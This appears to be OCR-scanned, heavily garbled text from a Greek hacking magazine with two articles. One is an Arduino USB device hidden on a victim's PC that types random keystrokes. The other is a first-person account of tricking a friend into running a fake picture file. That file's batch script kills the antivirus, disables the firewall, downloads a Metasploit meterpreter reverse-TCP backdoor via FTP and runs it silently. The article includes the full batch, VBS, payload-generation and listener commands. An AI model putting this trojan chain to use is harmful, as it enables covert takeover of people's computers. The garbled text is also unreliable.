nati φακοί» τ την αντιγράψουµε στον κατάλογο 
pinMode (LED, OUTPUT); // торе to Pin pe to On- libraries, εκεἰ ὀπου εἶναι EYKATE- 
digitalUrite (LED, HIGH); «..χαι To ανάβοιπις. στημένο το Arduino IDE. M’ αυτόν 
pinMode (SWITCH, INPUT); // Θέτοιηπιε to Pin Me to κάλ TOV Tpono n βιβλιοθήκη μας θα 
AinitalWrite (SWITCH. HIGHT: sy „ха ενπαναπαι ot πιω carro εγκατασταθεἰ και θα εἶναι ἐτοιμη 
а т прос xpñon. 


Ax, αυτὲς οι βιβλιοθήκες... Μας 
ἐχουν καλομάθει. Δεν θέλουμε 
οὐτε να σκεφτούμε πόσες σελίδες 
κώδικα θα χρειαζόταν να γράψου- 
με, μόνο και μόνο για να δώσουμε 
υποστήριξη USB στο Arduino µας. 
Κάτι τέτοιο θα ἦταν πολύ σκληρὀ 
Εικόνα 2 | αλλά και поло χρονοβόρο για τα γούστα µας, ἐτσι δεν εἶναι; Έτσι εἶναι, 
Το πρόγραμμα εἶναι δεν θέλουμε αντιρρήσεις, ειδικἀ and Tov Spir@lEvolution που λοξοκοιτάει 


Т (στα σίγουρα) αυτές τις γραμμές, ενώ γράφει кат=Вата σε Assembly για 


// Me τη διαδικασία setup πραγμτοποιούµε την αρχική ρύθμιση του Arc 


Μ΄ ἑνα κλικ ото να πετύχει αυτά που εμεἰὶς κάνουμε σε pia γραμμή”. Παρεμπιπτόντως, 
κουμπί Upload θα για να προλάβουμε διάφορα αντεπιχειρήµατα πρέπει να πούμε ὁτι οι βι- 
μεταφερθεί στο βλιοθήκες που κατεβάσαµε μὰς επιτρέπουν να δημιουργήσουμε σχεδὸν 


Arduino µας καὶ θα οποιαδήποτε συσκευἠ USB µε To Arduino µας! 
αρχισει να EKTE- 


λείται! Εφόσον ἐχουμε εγκαταστήσει τη βιβλιοθήκη, ξεκινάμε το Arduino IDE 
ἡ, αν ἐτρεχε NON, του KAVOUHE µια επανεκκίνηση. Ακολούθως аркі va 
φορτώσουμε το πρὀγραµµα που συνοδεύει το άρθρο και μπορεῖτε va Ka- 
τεβάσετε апо το 


http://bit.ly/dh@e2arduinoprank 


(αν τα περιεχόμενα του αρχείου απλά εμφανιστούν στον browser σας, 
αντιγράψτε τα μέσα о’ Eva veo text file κι αποθηκεύστε το µε ὀνομα 
arduino_usb_prank.pde). Αμέσως µετά θα συνδέσουμε το Arduino µας 
στον υπολογιστή και θα πατήσουμε το κουμπί Upload, ὥστε να φορτώ- 
σουµε το πρὀγραμμα. To Arduino µας πλέον εἶναι ἑτοιμο να σπάσει та 
νεύρα του υποψήφιου θύματος! Πα να το πετύχουμε αυτό, θα αποσυνδὲ- 
σουµε το καλώδιο USB που βάλαμε για τη μεταφορὰ του προγράμματος 
και θα συνδέσουµε το ἄλλο καλώδιο (εκείνο που φεύγει and τη θύρα USB 
που προσθέσαµε εμεὶς στο Arduino) στον υπολογιστή του θύματος”. Av 
4. Παρέμβαση апо τον Spir@l: Έχουν και τα кала τους οι βιβλιοθήκες! Δεν το αρνούμαι. Апо ‘dw και πέρα 


όμως Ва αποκαλὠ τον αγαπητὀ giannoug... Library-kiddie! :P 
5. ΠΡΟΣΟΧΗ! Μην συνδέετε ποτὲ και та δύο καλώδια ταυτόχρονα. 
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Σπάσιμο vedpwv...ota πιο απολαυστικά tou! 
ZZ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 


πήγαν όλα καλὰ, το εικονικὀ µας πληκτρολόγιο θα στέλνει στον unoÀo- 
γιστἠ τυχαία keystrokes! Αν, για παράδειγµα, ανοἰξουµε To Notepad, θα 
δούμε να εμφανίζονται διάφοροι χαρακτήρες χωρίς να κάνουμε τίποτε 
απολύτως! Εἱμαστε ἑτοιμοι ;) Πώς όμως δουλεύουν όλα αυτά; 


Μαγεία; 


Καθόλου! Όπως εἰπαμε, η βρώμικη δουλειά γίνεται µε τη βοήθεια του na- 
κέτου vusb-for-arduino. Πρόκειται για µια µεταφορά (port) της βιβλιοθή- 
κης V-USB (www.obdev.at/products/vusb/index.html) για την πλατφὀρ- 
μα Tou Arduino. H βιβλιοθήκη αυτή μετατρέπει τους AVR σε οποιαδήποτε 
συσκευἠ USB μπορούμε να σκεφτούμε! Βέβαια η V-USB εἰναι μᾶλλον δύ- 
σχρηστη, θέλει αρκετἠ μελέτη και γενικότερα δεν προορίζεται για αρχά- 
ριους. Αρχικά, λοιπόν, πρέπει να ευχαριστήσουμε τους προγραμματιστέὲς 
που την μετέφεραν στο Arduino και µας γλυτώνουν апо τους μπελάδες ;) 


Στον κὠδικα αρχικἁ προστίθεται (include) το header file της βιβλιοθήκης. 
Το τι γίνεται στο παρασκήνιο απὀ τη βιβλιοθήκη δεν µας ενδιαφἑρει. Ἀλ- 
λωστε όλα αυτά θέλαμε у’ αποφύγουμε. Πρέπει όμως να χουμε υπόψη бт! 
η συγκεκριμένη βιβλιοθήκη βασίζεται o” Eva κομμάτι του hardware του 
Arduino, στο onoio στηρἰζεται και η διαδικασἰα delay(). Ката συνέπεια, σ΄ 
ἑνα πρὀγραμµμα που χρησιμοποιεί την εν λόγω βιβλιοθήκη θα πρέπει va 


κατασκευάσουµε µια δικἠ µας διαδικασία για την παραγωγἠ καθυστερἠ- ‚ Εικόνα 3 
. ° í Ñ А Ano та 30720kb 

σεων. Στο πρὀγραμμα που συνοδεύει το άρθρο φτιάξαμε µια τέτοια δια- h 
| I i о А І μνήμης Flash xpn- 
δικασία (delayMS()) και θα τη βρείτε στο τέλος του listing. Ката та алла, σιμοποιούμε μόλις 
η λογική του προγράµµατος εἶναι αρκετά απλή. Στην αρχἠ ορἰζουμε ¿vav τα 3430! Αρκετά 
nivaka (array) εντὸς του οποίου τοποθετούμε τους χαρακτήρες που θὲ- μεγάλη σπατάλη 


πόρων, οµολογου- 


AOUHE να στέλνονται τυχαία στον υπολογιστή. Με την ευκαιρία, να πούμε μένως, Μήπως va 
бт! αν θέλετε να δείτε όλους τους διαθέσιμους χαρακτήρες που μπορεἰ το προγραμματί- 
να στέλνει το σατανικὀ µας πληκτρολόγιο, арке να ρἰξετε μία ματιά στο σουµε να φτιάχνει 
αρχείο UsbKeyboard.h, στο φάκελο της βιβλιοθήκης. καΓκαφε; 


ΜΕ τη ἀιαδιπασία setup прачитопоі отит την αρχική ρὔβπιση tov are 
oid setup) { 


pinMode (LED, OUTPUT) ; // @&toupe to Pin pe to On- 

digitalWrite (LED, HIGH); ff KOL τα oyvdepoupe. 

pinMode (SWITCH, INPUT); zz @2toupe to Pin Me то rea 

dinitaliriterSiWTTCH. ΗΤΠΗ] : | fol РУҒА ΠΙΠΙΣ тим кпїттпї “ 
4 | Π! h 
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Εικόνα 4 

Το πρώτο 
prototype Tou 
κυκλώματος, 
κατευθείαν απὀ τα 
εργαστήρια «ОМС, 
it’s giannoug»! 


VHAQKE 


ÁN 


O κὠδικας nou θα τρελάνει το υποψήφιο θύμα βρίσκεται µέσα στη δια- 
δικασἰα Ιοορ(). Περιττό να πούμε πως οτιδήποτε βρἰσκεται μέσα с’ αυτή 
τη διαδικασία επαναλαμβάνεται συνεχώς, μέχρι ν΄’ απενεργοποιήσουμε TO 
Arduino. O κὠδικας µέσα στο loop(), Лото“, ελέγχει αρχικἁ την κατάστα- 
ση (state) του pin 10. Av το έχουμε συνδέσει στο GND (όπως περιγράφα- 
µε και στην υλοποίηση του κυκλώματος), τότε το πρόγραµµα θεωρεἰ От! 
θέλουμε να στείλει τυχαίους χαρακτήρες. Ακολούθως, η εκτέλεση του 
προγράμματος καθυστερεί για Eva τυχαίο χρονικὀ διάστηµα (апо 5 ἑως 
10 δευτερόλεπτα), ενώ αµέσως μετὰ επιλέγει Evav τυχαίο χαρακτήρα ano 
τον πἰνακα που ορἰσαμε στην apx του προγράµµατος και τον στέλνει στο 
РС. Τόσο апла! 


Μια πρόταση για την εκτέλεση της Papoas στην πράξη 


Прота απ΄ όλα, πρέπει να βρούμε Eva μέρος va κρύψουμε το Arduino 
μας. Ναι, ξέρω бт! δεν εἶναι πολύ практіко µιας και καλώδια πετάγονται 
και εἶναι εὐκολο να βγουν στην μεταφορὰ ἡ και κατά την διάρκεια της 
εγκατάστασης. Ἑνας καλὸς χάκερ ӧрос̧ πάντα βρίσκει τρόπους! Αφού то 
τοποθετήσουµε σε µια ελεύθερη USB του υπολογιστή του θύματος µας, 
ката προτίμηση ὅταν δεν µας βλέπει, απομακρυνόμαστε σφυρίζοντας για 
να µην τραβήξουμε το ενδιαφέρον κανενός. Δε θέλουμε να µας χαλάσει 
το κόλπο, ETO! δεν εἶναι; 


Αφού λοιπὸν το θύμα µας καθίσει κι ανοίξει τον browser, τον αγαπημένο 
του κειμενογράφο ἡ οποιοδήποτε ἄλλο πρόγραµµα επηρεάζεται εύκολα 


»πΠάσιμο vedpwv...ota πιο απολαυστικά tou! 
“0” 


ano τα κουμπιά του πληκτρολογίου (θέλουμε να δούμε τι θα κάνετε HE 
κάποιον nou παϊζει παιχνίδια!), προσποιούμαστε OT! ξεχάσαμε κάποιο USB 
flash ἡ οτιδήποτε μπορούμε να σκεφτούμε εκεἰνη την στιγμὴ συνδεδεμέ- 
νο πάνω και αµέσως OKUBOUHE να το αφαιρέσουμε. Συνδέουµε TO καλώ- 
διο ano το GND στο ріп 10 Tou Arduino µας και φορώντας την troll face 
раска µας απομακρυνόμαστε. 


— 


“| New Text Document-bt - Notepad 
File Edit Format View Help 


T3E0T TE στ ενα διυο ὅδτρεια k 
εἶνα L 1 οντωης αρκετοα спос τικὀη ! 


Eikóva5 
Αφού συνδέσαµε την 
κατασκευή µας στον 
υπολογιστή και την 
ενεργοποιήσαµε, avoi- 
ἕαμε το Notepad. Та 
καταφέραμε! Το δια- 
βολικὀ µας πληκτρο- 
λόγιο εἶναι όντως πολύ 
EKVEUPIOTIKO :D 


4 h 


Το θύμα µας θα αρχίσει να φρικἀρει καθὼς διαφορετικοὶ χαρακτήρες θα 
ξεπετάγονται στην οθὀνη τυχαία, ακὀµη κι όταν δεν χρησιμοποιεί το πλη- 
κτρολόγιο. Στην αρχἠ θα δοκιμάσει restart, χωρὶς φυσικά αποτέλεσμα. 
Στη συνέχεια θα καταραστεί την Microsoft και θα µας φωνάξει να δούμετι 
συμβαίνει. Εμεὶς αν θέλουμε το συνεχίζουμε ἡ αποκαλύπτουµε την алђ- 
θεια, απλά προσέχουμε µην το παρακάνουµε κι έχουμε алла :D 


Ασκήσεις 


Ὅπως σε KdGE project, ἐτσι και o” αυτό υπάρχει ἄπλετος χώρος για βελ- 
τιώσεις κι επεκτάσεις. Καταρχάς θα εἶχε ενδιαφἐρον αν ο πρώτος τυχαἰ- 
ος χαρακτήρας παραγόταν µε σχετικἀ μεγάλη καθυστέρηση ὥστε ὁταν 
ενεργοποιήσουµετη συσκευἠ να µη µας υποψιαστεἰ κανένας! Апо 'κει και 
πέρα θα εἰχε πλάκα αν η συσκευἠ φρόντιζε ν΄ αυξομειώνει την ένταση 
του ἠχου, να αποθηκεύει то ὁποιο έγγραφο έχουμε ανοιχτό στην εκά- 
στοτε εφαρµογἡ και να την κλείνει και πάει λέγοντας... Περιμένουμε να 
μας πεἰτε τις ιδέες σας και να µας μεταφέρετε τα επεισόδια апо τις δικὲς 
σας φάρσες! 
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еш Μια εικόνα, χίλιοι τρόποι πρόσβασης ! 


παραμυθάκι, σαν αυτά που µας ἔλεγαν οι 
γιαγιάδες µας ὅταν ἡμασταν μικροί αλλά 
λίγο διαφορετικὀ. Το δικὀ µου παραμύθι 
όμως ἴσως να ‘val αληθινὀ, ἴσως και OXI. 


T 
Oa ἠθελα va σας 6inyn8@ Eva μικρὀ ῇ 
I 
I 

Ποιος ξέρει, apaye; Ι 


by Johnny Who 


62 


64 


VHAGKER 
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Τις προάλλες λοιπὸν που λέτε, καθόμουν κι ἐπινα το καφεδάκι µου συνο- 
μιλώντας сто Chat του Facebook р’ ἑναν πολύ καλὸ φίλο. Λἐγαμε, μεταξύ 
ἄλλων, για то πόσο ωραία περάσαμε στη χθεσινἠ ἐξοδο, καθώς και για 
κάποιες φωτογραφίες που βγάλαμε. O φίλος µου εἰχε φαγωθεἰί για το NOTE 
θα του στείλω αυτὲἐς τις φωτογραφίες. Και κάπως ETO! πέρασε η ιδέα and 
το μυαλὀ рои. Θα μπορούσα άραγε у’ αποκτήσω πρὀσβαση στον uno- 
λογιστἠ του φίλου, εκμεταλλευόμενος αυτὲς τις φωτογραφίες που τόσο 
πολὺ ἠθελε; 


Ακολουθεί ἑνας μονόλογος που ἑκανα. Ναι. Εγὠ µε τον εαυτὀ µου. 


- Και βέβαια μπορώ, μαζί µε τις φωτογραφίες, να του στείλω κι Eva 
backdoor, ελπίζοντας να το εκτελέσει. 
- Κολοκύθια. үй µην περάσει то backdoor ano τους mail servers χωρίς 


ν΄ ανιχνευτεί. Δηλαδή ακόµη και να περάσει апд τους mail servers, To 
antivirus στον υπολογιστή του GAAou Θ΄ αρχίσει να ουρλιάζει σαν τρελό! 


Τα λεπτά κυλούσαν στο βουβὸ δωμάτιο κι εγὠ ἡμουν βυθισμένος στις 
σκέψεις µου, προσπαθώντας να βρω µια λύση για να πετύχω το σκοπὀ 
μου. Δυστυχώς, δεν µου ερχόταν κάτι. Εκεἰ όμως που NOUV ἐτοιμος va 
τα παρατήσω, η σιγἠ στο δωμάτιο διεκόπη απότομα апо ша βροντερή, 
ενθουσιώδη φωνή. 


Ἠταν η δικἠ µου. 


H ιδέα 


Στο σηµεἰο αυτό οφείλω να παραδεχτώ оті γνώριζα αρκετἀ πράγματα για 
τον υπολογιστή του θύματος. Συγκεκριµένα, ήξερα От! 
ο τρέχει Windows 7 
ο ὠς anti-virus χρησιμοποιεί το Security Essentials της Microsoft 
ο δεν ἐχει εγκατεστημένο κάποιο third-party firewall, χρησιμοποιεί 
όμως εκεἰνο των Windows 
ο ἐχει απενεργοποιημένο το UAC 
ο δεν EXE] τσεκαρισμένη την επιλογἡ για την проВол των καταλἠ- 
ἕξεων στα αρχεία 
Κοντολογἰς, επρὀκειτο για το τυπικὀ box ενὸς μέσου Windows user. 


H ιδέα που εἶχα συλλάβει ἦταν πολὺ апл. Θα ἐφτιαχνα Eva αυτὸ- 
αποσυμπιεζόµενο εκτελέσιμο αρχείο µε το WinRAR και θα Tou ἄλλαζα то 
εικονἰδιο. Με το που θα το ETPEXE το υποψήφιο θύμα, θα εκτελούνταν 
ἑνα batch file (κι ἑνα Visual Basic Script, ὁπως αποδείχτηκε αργότερα), το 
onoio θα ¿kave ὁλη την απαραίτητη προετοιμασία WOTE να µου δώσει про- 
σβαση στο απομακρυσμένο box -- χωρίς фиска να το πάρει εἰδηση ο xph- 
στης του! Αναλυτικότερα, п GNOOTOAN του εκτελἐσιµου θα ἦταν η εξἠς : 


1. θα πρὀβαλλε µια εικὀνα (η οποία θα ἦταν και η µὀνη του θα 
έβλεπε το θύμα) 

θα τερμάτιζε το anti-virus 

θα απενεργοποιούσε το Windows Firewall 

θα κατἐβαζε To backdoor (ano ἑναν FTP server nou θα ἐστηνα) 


п оеш 


„ка! φυσικά θα εκτελούσε TO backdoor бїуоутас µου πρόσβα- 
ση στο σύστημα 


Μια εικόνα, χίλιοι τρόποι πρόσβασης 
Z/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 


Με λίγα λόγια, To EXE µου θα έριχνε óÀn την ασφάλεια του αποµακρυ- 
σμένου συστήματος. Αφού Φφρόντιζα να βάλω στο αυτο-αποσυμπιεζόµενο 
ἑνα αρκετά πειστικὀ εικονίδιο, θα του ἐριχνα µέσα το batch file, το VBS 
script και µια εικὀνα. Τέλος, 8a το ἐστελνα στο θύμα µέσα σ’ Eva ZIP. 


Σημείωση: Κατά τη διάρκεια της επίθεσης που iows ἐλαβε χώρα, έγινε 
και το OXETIKO port forwarding στον router του επιτιθέμενου. Σκοπὀς του 
ήταν να καταστήσει προσβάσιμο апо τον ἐξω κοσμο τον FTP server που 
έστησε ο επιτιθέμενος, δηλαδὴ να τον кау προσβάσιμο апо μηχανήματα 
εκτός του τοπικού δικτύου TOU επιτιθέµενου. Ίσως пал να µην ἐγινε Tino- 
τε an’ όλα αυτά. Πάντως στη συνέχεια αυτού του παραμυθιού ο αφηγητής 
δεν μπαίνει στις λεπτομέρειες του υποτιθέµενου port forwarding. Αντίθε- 
τα, επιλέγει να µην απομακρυνθεί ano την ουσία της διήγησης, γι΄ αυτὀ 
άλλωστε αναφέρεται σε virtual machines. 


H προετοιμασία 


Έχοντας αποφασίσει τι θα κάνω — και το κυριότερο, пос θα το κάνω 
-- ξεκινώντας ano τις πληροφορίες που εἶχα για τον υπολογιστή-στόχο 
και τις ὁποιες TEXVIKEG γνώσεις διέθετα, θα пёруаүа πλέον στην пра- 
En. Σήκωσα λοιπὀν Ta µανἰκια κι ἐπιασα δουλειά. (Σ.Τ.Α. Κάθε фора που 
διαβάζω για σήκωμα μανικιὼν πριν τη δουλειά, προσπαθώ να фаутасто 
κάποιον να το κάνει στ’ αλήθεια. Αποτυγχάνω. Κάθε фора.) 


Ἠθελα να εξομοιώσω τον υπολογιστή του θύματος, προκειµένου να ξέρω 
πώς θα αντιδράσει κατὰ τη διάρκεια της επίθεσης. Ακριβώς γι΄ αυτὸ ἑστη- 


To Security Essentials δεν εποπτεύει Tov 
υπολογιστή σας, επειδή η υπηρεσία Tou 
προγράμματος ¿xa διακοπεί. Πρέπει να 
πραγματοποιήσετε επανεκκίνηση τώρα. 


Κάντε κλικ στην επιλογή Ἔκκίνηση τώρα” για 
εκκίνηση της υπηρεσίας. 


Εκκίνηση τώρα. 


EN || 4 ) „23801 w 
{3 BEO ¿ngoi E 
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σα ἑνα virtual machine (VM) µε Windows 7, εγκτέστησα To Microsoft 
Security Essentials (MSE), απενεργοποΐησα το UAC κι ἄρχισα va παἰζω. 


Που λέτε, κάποια στιγµἠ ανοίγω τον task manager και ψάχνω για τις 
διεργασίες που σχετίζονται µε το MSE. Το μάτι µου πέφτει πάνω στη 
διεργασἰα MsMpEng.exe (Antimalware Service Executable). Δημιουργώ 
ἑνα νέο txt µε το Notepad, του αλλάζω την κατάληξη σε bat και µέσα 
προσθέτω την ακόλουθη γραμμή: 


taskkill /t /f /im MsMpEng.exe 


H εντολἠ σημαίνει: Τερμάτισε αναγκαστικἀ (/f) τη διεργασία µε ὀνομα 
MsMpEng.exe (/im MsMpEng.exe) και ὀποια ἄλλη διεργασία ξεκίνησε απ΄ 
αυτή (/t). Τρέχω το batch file κι ως αποτέλεσµα βλέπω την εικόνα 1. Όχι 
και πολὺ ενθαρρυντικἠ, £; 


Εκκινώ και пал To anti-virus, ανοίγω ξανά τον task manager και ψάχνω 
για κάτι που, δεν µπορεί, σίγουρα µου ξέφυγε. Παρατηρὠ τη διεργασία 
msseces.exe (Microsoft Security Client User Interface). 


Ανοίγω To batch file και προσθέτω µια ακόμα γραμμή *ndavw* апо την 
προηγούμενη. Τα περιεχόμενα του αρχείου ¿xouv ως εξἠς τώρα: 


taskkill /t /f /im msseces.exe 
taskkill /t /f /im MsMpEng.exe 


Τρέχω To batch file και... MMAM! To anti-virus εἶναι down — και μάλιστα χωρὶς 
va βγεί «κιχ» οὐτε an’ αυτό, OUTE апо το κέντρο ενεργειών των Windows 
7! Το прото και βασικότερο κάστρο έπεσε. Τα υπόλοιπα θα εἶναι παιχνιδάκι, 
προλαβαίνω να σκεφτώ. 


Ἠρθε η wpa v’ ασχοληθὠ µε To firewall. Ἠθελα να το κλείσω, µην τυχόν 
δημιουργήσει πρὀβλημα ката τη λήψη δεδοµένων апо Tov FTP server μου! 
Σκέφτηκα επίσης ότι ενδέχεται να εμποδίσει τη σύνδεση του backdoor and το 
μηχάνηµα-στὀχο πίσω στον υπολογιστή µου. Αν όμως ἐκλεινα το firewall θα 
πεταγόταν σχετικὀ μήνυμα апо το κἐντρο ασφαλείας των Windows. Οπότε 
αποφασἰζω να ρίξω *ка!* το κέντρο ασφαλείας. Προσθέτω λοιπὀν στο batch 
file τις παρακάτω γραμμὲς, για το κέντρο ασφαλείας και το Windows Firewall: 


taskkill /f /5 “services eq wscsvc” 


netsh advfrewall set allprofiles ‘state off 


Μια εικόνα, χίλιοι τρόπαι πρόσβασης 
0 


Σειρἀ ἐχει το κατέβασμα του backdoor, ano τον FTP server µου. ΟΙ eni- 
πλέον γραμμές που προσθέτω στο batch file εἶναι οι ακόλουθες: 


SetLocal EnableDelayedExpansion 
> #.ftp echo o 192.168.10.129 
>> #.ftp echo anonymous 

>> #.ftp echo someone@mail.com 
>> #.ftp echo get backdoor.exe 
>> #.ftp echo quit 

ftp -s:#.ftp 

del #.ftp 


move backdoor.exe “С:\” 


Ακολουθεἰ περιγραφὴ για τις πιο σημαντικὲς γραμμές. 
Γραμμή 2. Σύνδεση µε το domain/IP του FTP server 


Γραμμή 3. Login oç anonymous (ο server nou θα στήσω θα ρυθµιστεἰ 
ώστε να επιτρέπει το anonymous login) 


Γραμμή 4. ‘Eva ἐγκυρο email ως κωδικὀς πρὀσβασης για Ta anonymous 
logins 


Γραμμή 5. Κατέβασμα του backdoor 


Γραμμή 9. Μετακίνηση του backdoor σε κἄποιον GAAO φάκελο, WOTE να 
μη βρεθεί ξαφνικἁ μπροστὰ στο θύμα. 


Ολοκληρώνοντας τη συγγραφἠ Tou batch file, έπρεπε να φροντἰίσω για 
την εκτέλεση του backdoor. Έχοντας ορἰσει παραπάνω τη θέση στην 
οποία θα μετακινούσα το backdoor (C:\), οι τελευταίες γραμμές που θα 
ἐβαζα στο batch θα ἦταν οι ακόλουθες τρεις: 


са My 
backdoor.exe 
exit 
Ιδού тора ολόκληρο To batch file, ολοκληρωμένο: 
@echo off 
rem Ж Προβολή της εικόνας ΗΗΗΗΗΗΗΗΗΗΗ 
eikona. jpg 
rem + Τερματισμός anti-virus ΗἩΗΗΗΗΗΗΗΗΗΗΗ 
taskkill /t /f /im msseces.exe 
taskkill /t /f /im MsMpEng.exe 
rem ### Τερματισμός κέντρου ασφαλείας και Windows Firewall ### 
taskkill /f /fi “services eq wscsvc” 
netsh advfirewall set allprofiles state off 
rem + Λήψη backdoor #######HHHHH 
SetLocal EnableDelayedExpansion 


> #.ftp echo ο 192.168.108.129 
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>> #.ftp echo anonymous 

>> #.ftp echo someone@mail.com 
>> #.ftp echo get backdoor .exe 
>> #.ftp echo quit 


ftp -s:#.ftp 

del #.ftp 

move backdoor.exe “С:\” 

rem ######### Εκτέλεση tou backdoor #######HH 
Cau 

backdoor.exe 

exit 


Eixa πλέον τελειώσει µε τη δηµιουργἰα του batch file, στο οποίο ἐδωσα 
το πρωτότυπο ὀνομα file.bat. Όταν ὁμωςτο ἑτρεξα δοκιμαστικἁ, προβλη- 
µατίστηκα ἐντονα για την ορατότητα του παραθύρου εκτέλεσης. Αρχικά 
σκέφτηκα να δημιουργήσω µια συντόμευση κι απὸ τις ιδιὀτητὲς της va 
opiow EKTEAEON σε ελαχιστοποιημένο παράθυρο. AUTO орос δεν θα ἐλυ- 
νε το πρὀβλημα, αφού το παραθυράκι θα εξακολουθούσε να εἶναι орато 
στην task bar! Τη λύση NAGE να δώσει Eva VBS script, то οποίο кале! το 
batch file για εκτέλεση χωρίς να εμφανίζει τίποτε σχετικὀ στην οθόνη. 
Auto λοιπὀν που ¿kava тау να δημιουργήσω Eva νὲο txt, του οποίου 
аит τη фора του ἀλλαξα ὀνομα και κατάληξη σε file.vbs. Να και та πε- 
ριεχὀμενἁ του: 


Set WshShell = CreateObject (“WScript.Shel1”) 
cmds=WshShell.RUN(“file.bat”, ©, True) 
Set WshShell = Nothing 


Και μετὰ τα σκριπτάκια ἦταν n Opa του αυτο-αποσυμπιεζόμενου (self- 
extract, SFX) pe то WinRAR. Επιλέγω то batch, To VBS και την εικόνα που 
θα ἐβαζα µέσα και τα προσθέτω στο αρχείο συμπίεσης. Апо τις ιδιὀτητὲς 
του κοιτάω ὀλες τις καρτέλες, κάνοντας τις κατάλληλες ρυθμίσεις. 


ο Το παραγόμενο αρχείο το ορίζω ως αυτο-αποσυμπιεζόµενο και του 
αλλάζω το ὀνομα σε Picturel.exe. (Θυμηθείτε OT! το υποψήφιο 
θύμα *dev* έχει ενεργοποιημένη την επιλογἠ για την προβολή των 
καταλήξεων αρχείων!) 


ο Ορίζω ¿vav φάκελο μέσα στον οποίο θα αποσυμπιεστούν τα αρχεία. 
Δεν θα ἠθελα фиска να βρεθούν στα кала καθούμενα μπροστὰ 
στα μάτια του! 


ο Ζητώ την εκτέλεση του VBS script αµέσως μετὰ την αποσυμµπἰεση. 
Το VBS θα εκτελέσει το BAT κι αυτὸ θ΄ αναλάβει όλα τα υπόλοιπα. 


ο Επιλέγω την απόκρυψη των πλαισίων διαλόγου κατα την αποσυ- 
μπἱεση. 


ο Αλλάζω το εικονίδιο του SFX µε κάποιο ἆλλο, περισσότερο αθώο. 


Αφού τελείωσα, ἐριξα το Picturel.exe µέσα о’ ёха ZIP. Eixe φτάσει η ώρα 
να περάσω στο Linux (Monomaxos 5 , φυσικὰ :Р) 


Μια εικόνα, χίλιοι τρόποι πρόσβασης 
⁄/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 


H επίθεση 
Στο μηχάνημα µε To Linux εἶχα να κάνω τα ακόλουθα: 


• Прота an’ όλα να στήσω τον FTP server µου και να Tov ρυθµίσω 
κατάλληλα 


ο Να δημιουργήσω το backdoor µε To Metasploit και να το μεταφέρω 
στον κατάλληλο κατάλογο (για την ακρἰβεια с’ αυτον που ὀρισα ως 
root directory Tou FTP server) 


ο Na ξεκινήσω τον multi handler listener Tou Metasploit 


Meta ano µια σύντομη ἐρευνα αποφασἰζω να χρησιμοποιήσω τον vsftpd 
server, καθώς µε καλύπτει απόλυτα. Ανοίγω λοιπὀν va TEPHATIKO κι ως 
root πληκτρολογώ: 


Μετά ano λίγα δευτερόλεπτα ἐχει εγκατασταθεἰ. Έπρεπε тора va τον 
ρυθµίσω WOTE να δουλεύει ακριβώς ὁπως ήθελα. Κάνω λοιπον Eva αντἰ- 
γραφο του αρχείου config, για παν ενδεχόμενο: 


Ανοἰγω To original αρχείο µε To gedit, για να το επεξεργαστὠ. Πάντα ως 
root, δίνω στο τερματικὀ µου: 


Σβήνω OAO το περιεχόμενο και κοιτάζοντας апо το αντίγραφο τον τρόπο 
σύνταξης των ρυθμίσεων, αρχἰζω να προσθέτω εκείνες που θέλω. Στο 
τέλος, το δικὀ µου αρχείο ρυθμίσεων ἐδειχνε κάπως έτσι: 


rootegtannis-desktop: - 


Ἕρματικὸ βοήθεια 


tasploit v4.1.0 core:4.1 арі:1.0] 


Full command shell to the 
handler) 


vic's computer - remote 


t (handler 


(папе) > set lport box successfully pOwned! 


handler 
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listen=YES 

max_clients=2 

max_per_ip=1 
ftpd_banner=Welcome to my FTP service. 
anonymous_enable=YES 
anon_root=/var/ftp 
local_enable=YES 
write_enable=NO 
anon_upload_enable=NO 
апоп- mkdir write: enable=NO 
anon: other: write_enable=NO 
hide_ids=YES 
1ls_recurse_enable=NO 
tcp_wrappers=YES 
log_ftp_protocol=YES 
dual_log_enable=YES 
xferlog enable=YES 
idle_session_timeout=60 
data_connection_timeout=300 
accept_timeout=60 
connect_timeout=60 
dirmessage_enable=YES 


Παρατηρἠστε бт! επιτρἐπω To anonymous login, ενώ ορἰζω бт! боо! Kå- 
vouv login θα βρίσκονται αυτομάτως µέσα στον κατάλογο /var/ftp. 


Κάνω ёха restart στον FTP server, WOTE να парі τις νέες ρυθμίσεις: 
/etc/init.d/vsftpd restart 


Δημιουργὠ τον κατάλογο nou ἐθεσα we root (για Tov vsftpd server) στο 
αρχείο ρυθμίσεων: 


mkdir /var/ftp 


Zeipa εἶχε τώρα να φτιάξω το backdoor, το οποίο θα αποθηκευόταν µέσα 
στον κατάλογο /var/ftp. H ιδέα εἶναι ὁτι µε το που θα τρέξει το BAT στο 
μηχάνημα του θύματος θα συνδεθεἰ στον FTP server µου WOTE να KATE- 
βάσει To backdoor και να το εκτελέσει στο рпҳӣупра-отоҳо. 

Ανοίγω µια ved καρτέλα τερματικού και δίνω: 


/opt/metasploit4/msf3/./msfpayload windows/meterpreter/reverse_ 
tcp\ 


lhost=192.168.10.129 lport=4444 X > /var/ftp/backdoor.exe 
Created by msfpayload 

Payload: windows/meterpreter/reverse_tcp 

Length: 290 

Options: {“lport”=>"4444", “lhost”=>"192.168.10.129"} 


Μια εικόνα, χίλιοι τρόπαι πρόσβασης 
Αα 


Το Bpadaki της ἴδιας μέρας, ακολουθεἰ και πάλι ἑνας διάλογος στο chat 
του Facebook... 


-Κολλητέ, σου στέλνω εκείνες τις φωτογραφίες σε λιγάκι, OK; 
-Αμήν! Άντε, ἄντε, περιμένω! 
Σ’ Eva τερματικὀ τρέχω το Metasploit κι εκκινὠ τον multi handler listener: 


msf > use exploit/multi/handler 


msf exploit(handler) > set payload windows/meterpreter/reverse_ 
tcp 


payload => windows/meterpreter/reverse_tcp 

msf exploit(handler) > set lhost 192.168.100.129 
lhost => 192.168.10.129 

msf exploit(handler) > set lport 4444 

lport => 4444 

msf exploit(handler) > exploit 


[*] Started reverse handler оп 192.168.10.129:4444 
[*] Starting the payload handler... 


Με Tov listener ενεργοποιημένο στέλνω στα γρήγορα Eva mail µε To ZIP 
που περιέχει την εικὀνα. Το θύμα паіру το mail και κατεβάζει To ZIP. 
Ως ἐμπειρος χρήστης που εἶναι, σκανάρει то ZIP για malware. To αρχεἰο 
εἶναι ὀντως καθαρὀ. Αποσυμπιέζει λοιπὸν το ZIP κι avoiyel την εικόνα. 
